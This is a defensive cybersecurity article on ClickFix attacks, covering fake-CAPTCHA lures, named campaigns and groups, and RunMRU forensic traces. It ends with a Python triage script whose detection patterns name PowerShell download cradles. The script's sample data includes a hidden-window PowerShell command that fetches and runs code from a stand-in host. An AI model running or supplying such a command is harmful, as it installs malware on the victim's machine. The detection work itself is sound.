The ClickFix technique established itself in 2025 as a dominant attack method, adopted by a wide range of malicious actors—from financially motivated cybercriminals to state-backed groups—for several reasons: minimal technical investment, high reusability of kits, and advanced automation in producing malicious pages maximize returns per campaign.
By leveraging familiar interfaces (CAPTCHAs, update screens, fake security pages) and relying on actions performed by the user themselves, ClickFix bypasses part of traditional defensive controls and improves the conversion rate of attacks into actual system access, making it an especially attractive vector within an industrialized cybercrime marketplace.
Social engineering and ClickFix: active manipulation of users
This social engineering method aims to deceive the user into executing malicious commands themselves, exploiting trust or the desire to resolve an apparent technical problem, often via fake CAPTCHAs or supposed security verifications.
The operation begins with a decoy phase spread through phishing campaigns, malvertising, or compromised legitimate sites. The victim is directed to a page controlled by the attacker where, under a false pretext, they are prompted to copy and paste a command into a system tool such as PowerShell, a terminal, or the Run dialog opened with Win+R.
The user, convinced they are performing a legitimate action, actually triggers the infection of their machine. The method’s effectiveness lies in its ability to bypass traditional technical defenses by exploiting the victim’s trust and active participation, turning the human into the execution link rather than a security barrier.
One of the most notable campaigns observed in 2025, dubbed PHALT#BLYX and identified by Securonix analysts, highlights ClickFix being exploited at the heart of an operation specifically targeting hotel industry organizations.
This campaign used deceptive visuals such as fake CAPTCHAs and fake system errors (BSODs) to prompt victims to manually run a PowerShell command. The attack scenario relied on counterfeit hotel reservation cancellation notices simulating a processing spike, redirecting victims to a clone of an online booking site that faithfully imitated the original.
The infection culminated in the installation of a remote access tool (RAT), granting attackers full control over the compromised system. The attackers frequently anchor their campaigns in strategic timeframes, exploiting peak activity periods to maximize impact. The operation is said to have begun several months before the year-end holidays of 2025, a period especially favorable for fraud targeting the tourism sector.
From cybercrime to information warfare: a common tool
This technique is now spreading widely, testifying to its effectiveness and versatility. It is deployed by both financially motivated cybercriminals seeking to maximize their financial gains and by state-sponsored groups pursuing strategic objectives, whether espionage, gathering sensitive information, or disrupting targeted infrastructures.
● The North Korean Lazarus group used this technique in its “ClickFake Interview” campaign to exfiltrate cryptocurrency, targeting FinTech professionals with fake job offers. The attack aimed to deploy the GolangGhost backdoor.
● The Interlock ransomware group has integrated ClickFix into its arsenal to distribute info-stealers such as LummaStealer and BerserkStealer ahead of deploying its ransomware, using lures of fake browser or application updates.
● Various cybercriminal actors are using ClickFix to distribute a wide range of malware, including info-stealers Lumma Stealer and Lampion, RATs AsyncRAT and NetSupport RAT, and loaders MintsLoader and Latrodectus. The method’s success has even led to the commercialization of “ClickFix” kits on illicit forums since the end of 2024.
● State-sponsored groups such as TA427 (Kimsuky) and TA450 (MuddyWater) are also suspected of using this technique for espionage purposes.
In terms of detection and forensic analysis, ClickFix-based attacks nevertheless leave technical traces that investigators can use. When a user runs a command from the Run dialog (Win+R), it is recorded in a specific area of the system, the RunMRU registry key, which allows the entered commands to be reconstructed after the fact and suspicious behavior to be highlighted.
Some attackers attempt to reduce this visibility by launching their code from the Quick Access Menu (Win+X) instead, so that it does not appear in that history.
This evasion attempt, however, is not entirely effective: careful analysis of Windows event logs, or the use of advanced security solutions such as EDR, can still identify the creation of unusual or suspicious processes. Taken together, these elements show that, despite the sophistication of the social engineering employed by ClickFix, the attack continues to generate exploitable artifacts that must be systematically integrated into investigative and detection practices.
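The RunMRU reconstruction described above, as an added example that is not part of the original article: the script rebuilds the Win+R history from the key's raw values (single-letter values hold `command\1`, and MRUList orders them most recent first) and flags entries that look like a pasted ClickFix one-liner. The sample values and the indicator list are constructed for illustration; on a live host the values would be exported from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.

```python
"""Rebuild and triage the Run-dialog history (RunMRU) that ClickFix lures leave behind."""
import re

# Heuristic indicators of copy-pasted ClickFix commands (assumed list, not exhaustive).
SUSPICIOUS = {
    "powershell": re.compile(r"\bpowershell(\.exe)?\b", re.I),
    "mshta": re.compile(r"\bmshta\b", re.I),
    "download-cradle": re.compile(r"\b(iex|invoke-expression|irm|invoke-restmethod|curl)\b", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded-command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "url": re.compile(r"https?://", re.I),
}


def parse_runmru(values):
    """Return the Run-dialog commands, most recent first.

    `values` maps RunMRU value names to their data as stored in the registry:
    single-letter names hold 'command\\1'; MRUList lists the letters in MRU order."""
    commands = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:  # MRUList can reference a value that was deleted
            continue
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def flag_clickfix(commands):
    """Return (command, [matched indicator names]) for every suspicious entry."""
    hits = []
    for cmd in commands:
        reasons = [name for name, rx in SUSPICIOUS.items() if rx.search(cmd)]
        if reasons:
            hits.append((cmd, reasons))
    return hits


# Constructed sample of RunMRU values (not taken from a real incident).
SAMPLE = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "calc\\1",
    "c": 'powershell -w hidden -c "iex (irm http://example.invalid/verify)"\\1',
}

if __name__ == "__main__":
    for cmd, why in flag_clickfix(parse_runmru(SAMPLE)):
        print(f"[!] {cmd}  <- {', '.join(why)}")
```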
*Lucien Chaya Podeur is a cybersecurity expert at XMCO